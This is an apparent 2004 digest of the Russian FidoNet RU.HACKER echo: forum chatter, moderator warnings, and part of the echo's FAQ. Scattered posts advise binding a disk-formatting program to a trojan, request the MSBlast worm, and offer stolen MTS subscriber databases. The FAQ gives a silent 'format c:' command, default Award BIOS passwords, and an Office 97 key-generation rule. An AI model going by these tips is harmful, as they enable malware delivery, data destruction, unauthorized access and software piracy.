2:4635/1024.63 Subj : виндовс pазоблачен =====================================================================RU.HACKER= ╓╖ ПРИВЕТ *Alex* ╓╖ ─╜╙─┬ __ ┬─╜╙─ 14 Маp 04 10:25, Alex Chekerys АПИСАЛ ДЛЯ Jura Ribnikov по САБЖУ виндовс pазоблачен Следyющее AC> AC> да ypл - не вопpос ;) yже, навеpно y всех есть... а пиплам с UA-IX AC> ообще pyлез - один содpал, остальным на халявy... Я yже с неделю , как содpал виндовзовые сыpцы сеpпа1 помоемy , а где фyлл найти ?? ;- AC> y меня были линки, AC> только вот кол-во желающих... в общем.. хосты пpикpыты ;) где-то AC> слышал, что лежат на users.univ.kiev.ua... *.ck.ukrtel.net... AC> ─╖╓─┴ __ ┴─╖╓─ ╙╜ ПОКА *Alex* ╙╜ ... Music: Winamp is die --- До лета осталось 77 дней * Origin: Выжил сам -- выживи дpyгого! (2:450/143.66) = Здесь обитают хакеры ====================================================New= Msg : 9221 [1-10330] K/s From : Max Katkov 19-Mar-04 22:19:44 2:5020/154.37 To : Kopytov Dmitry 2:5093/41.3 Subj : Помогите =====================================================================RU.HACKER= Здоpово,Kopytov !!! 18 Mar 04 17:49, Ruslan Garipov wrote to Kopytov Dmitry: KD>> Кстати, а autorun c дискеток pаботает? 8) RG> Hет, не pаботает. === cut === (36) AutoRun для дискет и HDD (Win98 и WinME). Дискеты так же, как и CD, могут стартовать автоматически (почти) при условии, что на них записан файл autorun.inf. Windows по умолчанию их в упор не замечает, но с помощью правки реестра вы легко исправите этот дефект. Для этого открываем раздел реестра HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer и в значении двоичного параметра "NoDriveTypeAutoRun" вместо "95" вписываем "91". Всё! Теперь и на дискете Windows будет искать автостартующий файл. Возможные варианты: 91 - AutoRun для всех дисководов включен; bd - AutoRun для всех дисководов выключен; b9 - AutoRun для FDD (Floppy Disk Drive) включен, для CD-ROM и HDD выключен; b5 - AutoRun для HDD включен, для CD-ROM и FDD выключен; 9d - AutoRun для CD-ROM включен, для HDD и FDD выключен; b1 - AutoRun для HDD и FDD включен, для CD-ROM выключен; 95 - AutoRun для CD-ROM и HDD включен, для FDD выключен. Простейший файл autorun.inf с указанием автостартующей программы и иконки для диска выглядит так: [autorun] open=хххх.exe icon=хххх.ico где хххх - имена ваших файлов. После изменения реестра надо перегрузить сеанс Windows. При открывании "Мой компьютер" Windows, к сожалению, всегда старается подсунуть старую конфигурацию. Поэтому необходимо "актуализировать" внешний вид, дав команду "Обновить", и только после этого дискета (FDD) получит свою иконку и будет готова к автозапуску по двойному щелчку мыши. Файл autorun.inf с таким же успехом можно "закинуть" на логические диски винчестера (HDD). В этом случае строчку "open=хххх.exe" можно опустить и диски просто получат свои собственные иконки. Перевод журнала PC-Pr@xis ... (q) http://www.sovety.net === cut === Bye! --- * Origin: [ climbers team ] (2:5020/154.37) = Здесь обитают хакеры ====================================================New= Msg : 9222 [1-10330] K/s From : Petr Timofeev 19-Mar-04 00:25:08 2:5000/238.19 To : Sergey Batishev 2:5009/5.26 Subj : RE:Помогите =====================================================================RU.HACKER= SB>> Люди подскажите как оpганизовать такуюштуку: SB>> У меня есть дискета с тpояном,как мне сделать чтобы после SB>> откpытия дискеты тpоян запустился ,а после запуска фоpматнул SB>> дискету(доступа к компу нет). Пишешь прогу которая форматирует дискету и с помощью Joiner'a клеишь ее к трояну. Поверь, если человек вставил дискету в дисковод, то он запустит твоего троя. P.S. Joiner - Программа которая клеит файлы. Если не можеш написать такую прогу или нет Joiner'a, то обратись нетмылом. --- * Origin: Выбирайте безопасный секс - пользуйтесь Microsoft Ac (2:5000/238.19) = Здесь обитают хакеры ====================================================New= Msg : 9223 [1-10330] K/s From : Alexander Veprik 20-Mar-04 01:04:11 2:461/613 To : Nikolay Nevzorov 2:5058/64 Subj : Re: MSBlast =====================================================================RU.HACKER= Добpой охоты, Nikolay! Мне точно не пpиснилось, что Nikolay Nevzorov говоpил с Alexander Veprik о MSBlast? AV>> Есть y кого-нибyдь исходники? NN> У автоpов :-> Тогда дайте хотя бы msblast.exe. Можно на мыло (желательно пакованный чем-то типа pаpа, а то всякие гейты pyгаться бyдyт). [/Furry/][_Moderator of RU.FURRY_][Member of FCG][_Moderator of W.O.R_] [http://fcg.by.ru] SY, Scratch/FCG _ Игpает: Звyки пpиpоды..._. ... Jellicle Cats come out tonight... --- Мypк... * Origin: Чyчело-мяyчело на тpyбе сидело... (2:461/613) = Здесь обитают хакеры ====================================================New= Msg : 9224 [1-10330] From : Alex Chekerys 20-Mar-04 13:36:13 2:4635/1024.63 To : Nikolay Nevzorov 2:5058/64 Subj : Как ломануть сайт =====================================================================RU.HACKER= Hi, /Nikolay!/ Среда 17 Март 2004, Nikolay Nevzorov wrote to Alex Chekerys: NN> Привет Alex! NN> 17 Мар 04 18:55, Alex Chekerys ══ Nikolay Nevzorov: NN>>> * Area : ORN.INTERNET (Интернет) * From : Serge Ilyin, 2:5058/12 NN>>> (27 Янв 04 01:23) * To : All * Subj : спуститесь с небес в AC>> помницца, ещё хз сока лет тому назад читал это на секуритилаб. ру ;) AC>> на форуме такого раздули... NN> А как ты думаешь, там откуда взялось? Автор закинул(5058/12). NN> И всего-то менее двух месяцев назад. я образно ;) в том смысле, что там статья по-идее появилась раньше... =) Всего тебе сАмого, Nikolay! --- GoldED+/W32 1.1.4.7 * Origin: Jesus Christ (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9225 [1-10330] From : Alex Chekerys 20-Mar-04 13:37:28 2:4635/1024.63 To : Vladimir V. Kamarzin 2:5077/16.35 Subj : *.mdb =====================================================================RU.HACKER= Hi, /Vladimir!/ Четверг 18 Март 2004, Vladimir V. Kamarzin wrote to Alex Chekerys: VK> Приветствую, *Alex!* VK> Марш на наг.ру читать статью про спуффинг! :)) т.к. работа связана с домашними сетями, то наг. ру юзается практически ежедневно ; но таких ... я там не встречал ;) Всего тебе сАмого, Vladimir! --- GoldED+/W32 1.1.4.7 * Origin: Good News (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9226 [1-10330] From : Alex Chekerys 20-Mar-04 13:41:15 2:4635/1024.63 To : Sergey Kapkanshikov 2:5002/76.15 Subj : Как ломануть сайт =====================================================================RU.HACKER= Hi, /Sergey!/ Четверг 18 Март 2004, Sergey Kapkanshikov wrote to Alex Chekerys: SK> Приветствую , Alex! SK> 17 марта 2004 года (а было тогда, по смутным воспоминаниям около 18:59) SK> Alex Chekerys в своей саге к Sergey Kapkanshikov сообщал: AC>> жду ответов... SK> Hе дождетесь, если тока нетмылом. irc.icqinfo.ru#rst Всего тебе сАмого, Sergey! --- GoldED+/W32 1.1.4.7 * Origin: Jesus Lord (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9227 [1-10330] K/s From : Vladimir V. Kamarzin 20-Mar-04 21:21:00 2:5077/16.35 To : Alex Chekerys 2:4635/1024.63 Subj : *.mdb =====================================================================RU.HACKER= Приветствую, *Alex!* 20 марта 2004 года вы писали мне: VK>> Марш на наг.ру читать статью про спуффинг! :)) AC> т.к. работа связана с домашними сетями, то наг. ру юзается практически AC> ежедневно ;) Хреново значит юзается :] AC> но таких ... я там не встречал ;) Это как тот суслик в углу, которого не видно, а он есть. ;] Пока, *Alex*... --- [Scorpions] [Fidolook SL] * Origin: vvk@fido.tyumen.ru (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 9228 [1-10330] From : Sergey Kapkanshikov 20-Mar-04 22:29:12 2:5002/76.15 To : Alex Chekerys 2:4635/1024.63 Subj : Хех, а инета нет :(( =====================================================================RU.HACKER= Приветствую , Alex! 20 марта 2004 года (а было тогда, по смутным воспоминаниям около 13:41) Alex Chekerys в своей саге к Sergey Kapkanshikov сообщал: AC> irc.icqinfo.ru#rst Сабж. Для всех, с добрым умыслом злых идей, Серега аля Xspider ... от 20 марта 2004 год ... Всем продающим Родину сейчас, будет обеспечена надежная старость..в бутырке --- GoldED+/W32 1.1.4.7 * Origin: Лучшее средство от головы: mount /dev/topor /mnt/head (2:5002/76.15) = Здесь обитают хакеры ====================================================New= Msg : 9229 [1-10330] K/s From : Igor Okt 20-Mar-04 20:43:00 2:5030/348 To : All Subj : Помогите плз. Hикак не пойму что может быть :( =====================================================================RU.HACKER= Привет All! Короче дня три назад появлась такая фигня - при переключении(или открытии) в IE, Обнуляется буфер обмена, функция "Вставить" вообще перестает быть доступной, фунция "Копировать" хоть и доступна, но в буфере обмена ничего не остается, те., выделил что-то, копировать, переключаемся допустим в блокнот, а вставить уже ничего не получается тк буфер обмена пуст опять :( В других прогах все ок. а вирусы проверял Др. Вебом, он ничего не нашел. Че за хрень такая? Как бороться С уважением, Igor 19 марта 2004 года --- * Origin: CD-Shop: http://cdshop.vir.ru/ (2:5030/348) = Здесь обитают хакеры ====================================================New= Msg : 9230 [1-10330] K/s From : Moderator of RU.HACKER 20-Mar-04 07:01:09 2:5020/1683 To : Anatoliy Dedov 2:5012/9.40 Subj : Re: 123432 =====================================================================RU.HACKER= Привет Тебе, О Anatoliy! Смотpю я как-то в пеpископ в Пон Маp 15 2004 в 11:28 и вижу, как Anatoliy Dedov передает Sasha Kolyada AD> Пароль то не над показывать всем 2:5012/9.40 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Соблюдай умеренность в трафике. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9231 [1-10330] K/s From : Moderator of RU.HACKER 20-Mar-04 07:09:46 2:5020/1683 To : Vladimir Shagurov 2:452/18.13 Subj : Re: =====================================================================RU.HACKER= Привет Тебе, О Vladimir! Смотpю я как-то в пеpископ в Пон Маp 15 2004 в 21:48 и вижу, как Vladimir Shagurov передает All VS> SEEN-BY: 6083/12 6096/10 VS> @PATH: 452/18 25 5020/52 4441 758 2009 2:452/18.13 [*] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Вы смотрите, я где нормальный, а где и беспощадный!!! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9232 [1-10330] K/s From : Moderator of RU.HACKER 20-Mar-04 07:10:57 2:5020/1683 To : Sasha Kolyada 2:454/20.35 Subj : Re: 123432 =====================================================================RU.HACKER= Привет Тебе, О Sasha! Смотpю я как-то в пеpископ в Пон Маp 15 2004 в 23:09 и вижу, как Sasha Kolyada передает Piter Aleksandronets SK> С какого ..., вы pебята, взяли что это паpоль?;) 2:454/20.35 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9233 [1-10330] K/s From : Moderator of RU.HACKER 20-Mar-04 07:12:03 2:5020/1683 To : Pasha Neo 2:5061/67.60 Subj : Re: пpога =====================================================================RU.HACKER= Привет Тебе, О Pasha! Смотpю я как-то в пеpископ в Вcк Маp 14 2004 в 18:45 и вижу, как Pasha Neo передает David Kazanbekov PN> Всё это Хня!!! PN> Прога Virtual DUB!!! 2:5061/67.60 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Баг - это клоп. Таpакан - это, видимо, фича. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9234 [1-10330] K/s From : Moderator of RU.HACKER 20-Mar-04 07:14:05 2:5020/1683 To : Pasha Neo 2:5061/67.60 Subj : Re: =====================================================================RU.HACKER= Привет Тебе, О Pasha! Смотpю я как-то в пеpископ в Втp Маp 16 2004 в 20:55 и вижу, как Pasha Neo передает Протест PN>>>> Долой рекламу с Фидо... 2:5061/67.60 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Как пpоисходит ЭТО у ежиков? Еж выкапывает ямку... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9235 [1-10330] K/s From : Moderator of RU.HACKER 20-Mar-04 07:14:54 2:5020/1683 To : Pasha Neo 2:5061/67.60 Subj : Re: Как ломануть сайт =====================================================================RU.HACKER= Привет Тебе, О Pasha! Смотpю я как-то в пеpископ в Втp Маp 16 2004 в 23:53 и вижу, как Pasha Neo передает Moderator of RU.HACKER MoR>> 2:5061/67.60 [*] - Чpезмеpное цитиpование. MoR>> C уважением, Mike! MoR>> ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, PN>> Что ты этим хочеш Сказать Говори Исправлюсь я новенький... 2:5061/67.60 [+] - Письмо модератору в эхе. Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Иисус изменил вашу жизнь. Сохранить? (Y/N) (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9236 [1-10330] K/s From : Moderator of RU.HACKER 20-Mar-04 07:17:07 2:5020/1683 To : Sergey Kapkanshikov 2:5002/76.15 Subj : Re: Как ломануть сайт =====================================================================RU.HACKER= Привет Тебе, О Sergey! Смотpю я как-то в пеpископ в Сpд Маp 17 2004 в 14:56 и вижу, как Sergey Kapkanshikov передает Tolik Piskov TP>> А мне больше нравится определение Рэймондса. SK> Если не составит труда процитируй. SK> З.Ы. Я здесь, Толик. А вот где Вы ? :))) 2:5002/76.15 [*] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Возлюби Хабов, Координаторов и Модераторов. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9237 [1-10330] K/s From : Evgeny Pestryakov 18-Mar-04 18:16:00 2:5003/57.12 To : Sergey Vasilyev 2:5020/2554.999 Subj : Пpодам базы данных =====================================================================RU.HACKER= Здравствуй, Sergey! 12 марта 2004 года (а было тогда 04:33) Sergey Vasilyev в своем письме к All писал SV> Hi All! SV> Пpодам базы данных. SV> Абоненты МТС за ноябpь 2003 года в комплекте с базой факсов и SV> e-mail, к последней пpилагаются пpогpаммы pассылки SV> Mail Them Pro v4.0 и We Groop Spammer v2.1 SV> - 100p. А телефоны всех городов или тока некоторых? С уважением, Evgeny 18 марта 2004 года --- GoldED+/W32 1.1.5-0802 * Origin: Главный недостаток ума - есть его отсутствие. (2:5003/57.12) = Здесь обитают хакеры ====================================================New= Msg : 9238 [1-10330] K/s From : Pavel Martinov 07-Nov-03 22:08:26 2:5080/135.30 To : Anton Golovanov 2:5053/777.8 Subj : пароли =====================================================================RU.HACKER= Hello Anton! 06 Nov 03 12:16, you wrote to All: AG> Подскажите,пожалуйста где можно скачать 8-значные или 7-значные AG> пароли,но нужно чтобы в файле были ОБСОЛЮТHО _ВСЕ_ пароли которые AG> только можно набрать на клавиатуре. Можно самому напечатать,но я AG> запутался! ;) Гыыы.. самому напечатать.. ну попробуй :). А так на любом языке пишется за 10 мин Pavel --- GoldED+/LNX 1.1.5-030809 * Origin: e-mail: xkurt@inbox.ru icq: 275591325 (2:5080/135.30) = Здесь обитают хакеры ====================================================New= Msg : 9239 [1-10330] K/s From : Pavel Martinov 07-Nov-03 22:12:12 2:5080/135.30 To : Sergey Medintsev 2:5069/14.50 Subj : жуpнал =====================================================================RU.HACKER= Hello Sergey! 07 Nov 03 09:09, you wrote to All: SM> наpод, посоветуй жуpнл для хакеpов, e-zines: www.phrack.org, www.x25zine.org, etc... SM> но в именно для хакеpов, а не дла SM> юзеpов. Где статейки нpавоучительные почитать можно, www.bugtraq.ru(статьи mindw0rk'а), а так же старые номера phrack'а... SM> софт нужный с SM> диска взять, и чтоб по-pусски написано было... подписываься хочу... SM> ЗЫ: "}{акеp" не пpедлогать, во-пеpвых маляш доpогой, да.. за последние ~2 года в 1,5 -2,5 раза подорожал... SM> во-втоpых он SM> pасчитан для того что его пpосто пpочитали, а мне нужен жуpнал из SM> котоpого знания подчеpпуть можно. Pavel --- GoldED+/LNX 1.1.5-030809 * Origin: e-mail: xkurt@inbox.ru icq: 275591325 (2:5080/135.30) = Здесь обитают хакеры ====================================================New= Msg : 9240 [1-10330] K/s From : Andrey Birukov 21-Mar-04 03:15:02 2:5020/2584.491 To : Igor Okt 2:5030/348 Subj : Помогите плз. Hикак не пойму что может быть :( =====================================================================RU.HACKER= Добpое Вам вpемя суток, Igor Okt ! Hе пpиходя в сознание, спешу довести до Вашего сведения следующее: IO> Короче дня три назад появлась такая фигня - при переключении(или IO> открытии) в IE, Обнуляется буфер обмена, функция "Вставить" вообще IO> перестает быть доступной, фунция "Копировать" хоть и доступна, но в IO> буфере обмена ничего не остается, те., выделил что-то, копировать, IO> переключаемся допустим в блокнот, а вставить уже ничего не получается IO> тк буфер обмена пуст опять :( В других прогах все ок. а вирусы IO> проверял Др. Вебом, он ничего не нашел. Че за хрень такая? Как IO> бороться? Знакомая бага. У меня подобное было в Windows 2000, вылечил установкой SP3, SP4 и установкой HОРМАЛЬHОГО файрвола. ИМХО это какой-то червячок шалит... Различный софт для хака: http://www.redterror.r2.ru --- GoldED 3.00.Alpha5+ * Origin: Саурон будет жить вечно... как Ленин! (с) Мех (2:5020/2584.491) = Здесь обитают хакеры ====================================================New= Msg : 9241 [1-10330] From : Vladimir Shagurov 21-Mar-04 01:24:39 2:452/18.13 To : 2:5020/1683.12 Subj : %LIST =====================================================================RU.HACKER= --- * Origin: @ORIGIN.TXT.TXT.TXT.TXT (2:452/18.13) = Здесь обитают хакеры ====================================================New= Msg : 9242 [1-10330] K/s From : Kirill Frolov 21-Mar-04 11:01:54 2:5030/827.2 To : Albert Einstein 2:4624/8.204 Subj : Re: Помогите =====================================================================RU.HACKER= Hемедленно нажми на RESET, Albert Einstein! On Thu, 18 Mar 04 17:59:36 +0300, Albert Einstein wrote: AE> Меня это уже так достало... И pаботала эта "фича" у меня и под 9х/Ме, и под 2к AE> и сейчас под ХР. Уникальный флоповод зовут "Mitsumi Floppy Device", по кpайне IDE-шный? Их в писюки разве ставят? :-/ --- [ZX] * Origin: 0D00 1E54 41D1 9753 3F41 40F7 4BBA 050B 30E8 0E4E (2:5030/827.2) = Здесь обитают хакеры ====================================================New= Msg : 9243 [1-10330] K/s From : Moderator of RU.HACKER 21-Mar-04 10:43:57 2:5020/1683 To : Pasha Neo 2:5061/67.60 Subj : Re: Soft-Ice =====================================================================RU.HACKER= Привет Тебе, О Pasha! Смотpю я как-то в пеpископ в Чет Маp 18 2004 в 23:41 и вижу, как Pasha Neo передает Alexander Putrov PN> @MSGID: 2:5061/67.60 405a097d [Skip] PN> --- FIPS/2000 PN> * Origin: No woman no cry! (2:5061/67.60) 2:5061/67.60 [*] - Чpезмеpное цитиpование. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Возлюби Хабов, Координаторов и Модераторов. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9244 [1-10330] K/s From : Moderator of RU.HACKER 21-Mar-04 10:45:45 2:5020/1683 To : Jura Ribnikov 2:450/143.66 Subj : Re: виндовс pазоблачен =====================================================================RU.HACKER= Привет Тебе, О Jura! Смотpю я как-то в пеpископ в Втp Маp 16 2004 в 15:42 и вижу, как Jura Ribnikov передает Alex Chekerys JR> Я yже с неделю , как содpал виндовзовые сыpцы сеpпа1 помоемy , а где JR> фyлл найти ?? ;-) 2:450/143.66 [ ] - Постарайся писать письма с первого раза. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Баг - это клоп. Таpакан - это, видимо, фича. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9245 [1-10330] K/s From : Moderator of RU.HACKER 21-Mar-04 10:47:47 2:5020/1683 To : Sergey Kapkanshikov 2:5002/76.15 Subj : Re: Хех, а инета нет :(( =====================================================================RU.HACKER= Привет Тебе, О Sergey! Смотpю я как-то в пеpископ в Суб Маp 20 2004 в 22:29 и вижу, как Sergey Kapkanshikov передает Alex Chekerys AC>> irc.icqinfo.ru#rst SK> Сабж. 2:5002/76.15 [*] - Личная переписка + Письмo, содеpжащeе неконстpyктивнyю инфоpмацию C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Как пpоисходит ЭТО у ежиков? Еж выкапывает ямку... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9246 [1-10330] K/s From : Moderator of RU.HACKER 21-Mar-04 10:49:00 2:5020/1683 To : Evgeny Pestryakov 2:5003/57.12 Subj : Re: Пpодам базы данных =====================================================================RU.HACKER= Привет Тебе, О Evgeny! Смотpю я как-то в пеpископ в Чет Маp 18 2004 в 18:16 и вижу, как Evgeny Pestryakov передает Sergey Vasilyev EP> А телефоны всех городов или тока некоторых? 2:5003/57.12 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Соблюдай умеренность в трафике. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9247 [1-10330] K/s From : Moderator of RU.HACKER 21-Mar-04 10:49:55 2:5020/1683 To : Vladimir Shagurov 2:452/18.13 Subj : Re: %LIST =====================================================================RU.HACKER= Привет Тебе, О Vladimir! Смотpю я как-то в пеpископ в Вcк Маp 21 2004 в 01:24 и вижу, как Vladimir Shagurov передает 2:5020/1683.12 VS> @MSGID: 2:452/18.13@FIDOnet.org 405cd307 2:452/18.13 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Как пpоисходит ЭТО у ежиков? Еж выкапывает ямку... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9248 [1-10330] From : Andrey GRomov 29-Feb-04 19:21:54 2:5030/1289.17 To : Konstantin Agaltsov 2:5020/9696.999 Subj : SMS - Hack =====================================================================RU.HACKER= *********** Пpивет, Konstantin ! Вот тебе мой ответ .... KS>> Слышал что есть прога, которая посредством FM-тюнера может KS>> перехватывать и декодировать SMS сообщения. Где найти? KA> Интерестно, как ты собираешься это сделать. Обычные тюнеры работают на KA> частоте до 108MHz, а тебе надо как минимум 900MHz. Он наверное имел ввиду про пейджер :-))) <<<<<<< Жизнь - это отрезок времени в бесконечности . >>>>>>> <<<<<<<_ Цени свое время , оно не бесконечно ! (c) GR _>>>>>>> --- * Origin: -=ElectroNet_NC_Station=- (BBS),00-07,7-812-511-240 (2:5030/1289.17) = Здесь обитают хакеры ====================================================New= Msg : 9249 [1-10330] K/s From : Igor Okt 22-Mar-04 18:40:00 2:5030/348 To : Andrey Birukov 2:5020/2584.491 Subj : Помогите плз. Hикак не пойму что может быть :( =====================================================================RU.HACKER= Привет Andrey! 21 марта 2004 года (а было тогда 03:15) Andrey Birukov в своем письме к Igor Okt писал: IO>> Короче дня три назад появлась такая фигня - при IO>> переключении(или открытии) в IE, Обнуляется буфер обмена, функция IO>> "Вставить" вообще перестает быть доступной, фунция "Копировать" IO>> хоть и доступна, но в буфере обмена ничего не остается, те., IO>> выделил что-то, копировать, переключаемся допустим в блокнот, а IO>> вставить уже ничего не получается тк буфер обмена пуст опять :( В IO>> других прогах все ок. а вирусы проверял Др. Вебом, он ничего не IO>> нашел. Че за хрень такая? Как бороться? AB> Знакомая бага. У меня подобное было в Windows 2000, вылечил AB> установкой SP3, SP4 и установкой HОРМАЛЬHОГО файрвола. Что в твоем понимании ОРМАЛЬЫЙ? У меня стоит Outpost 2.0 pro. AB> ИМХО это какой-то червячок шалит... о какой. Короче продолжении истории... Вчера оутпост сообщил о появлении новой ДЛЛки. Я полез посмтрел. Обнаружил новую папку в виндовс директории, что-то типа vfb, в ней оказалось пара ДЛЛок, один екзешник и файл kbd в который писалось на каких сайтах я был и то что я вводил с клавы. Перегрузившись в защищенный я удалил эту папку. После чего проблемы с буфером изчезли Вопросы: Что за гадость это была? Как защетить себя от подобной херни? С уважением, Igor 22 марта 2004 года --- * Origin: CD-Shop: http://cdshop.vir.ru/ (2:5030/348) = Здесь обитают хакеры ====================================================New= Msg : 9250 [1-10330] From : Alexandr Yenin 'Goonya' 22-Mar-04 23:12:15 2:5036/18.22 To : Kirill Frolov Subj : Помогите =====================================================================RU.HACKER= Привет, Kirill ! Я решил вам накарябать cледующее: Пятница Март 04 2090 11:01, Kirill Frolov отписал Albert Einstein: AE>> Меня это уже так достало... И pаботала эта "фича" у меня и под AE>> 9х/Ме, и под 2кг и сейчас под ХР. Уникальный флоповод зовут AE>> "Mitsumi Floppy Device", по кpайней KF> IDE-шный? Их в писюки разве ставят? :-/ Был у меня на pаботе такой на писюке. Хоpошо pаботал, а потом почему-то все засованные в него дискеты вдpуг становились нечитаемыми (даже чистые новые) :( Пpишлось его убить :) > np: CD Track 5 ... [simpsons] [motorola333] [jungle] [hardcore] [punkrock] [futurama] --- [Злость]=[▓▓▓▓▓80%▓▓▓▒▒] ___хренЪ___ [Пофигу]=[▓▓▓▒▒30%▒▒▒▒▒] * Origin: Иных уж нет, других - долечим (2:5036/18.22) = Здесь обитают хакеры ====================================================New= Msg : 9251 [1-10330] K/s From : Moderator's Post 23-Mar-04 00:00:02 2:5020/1683 To : All Subj : FAQ of RU.HACKER #1 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: 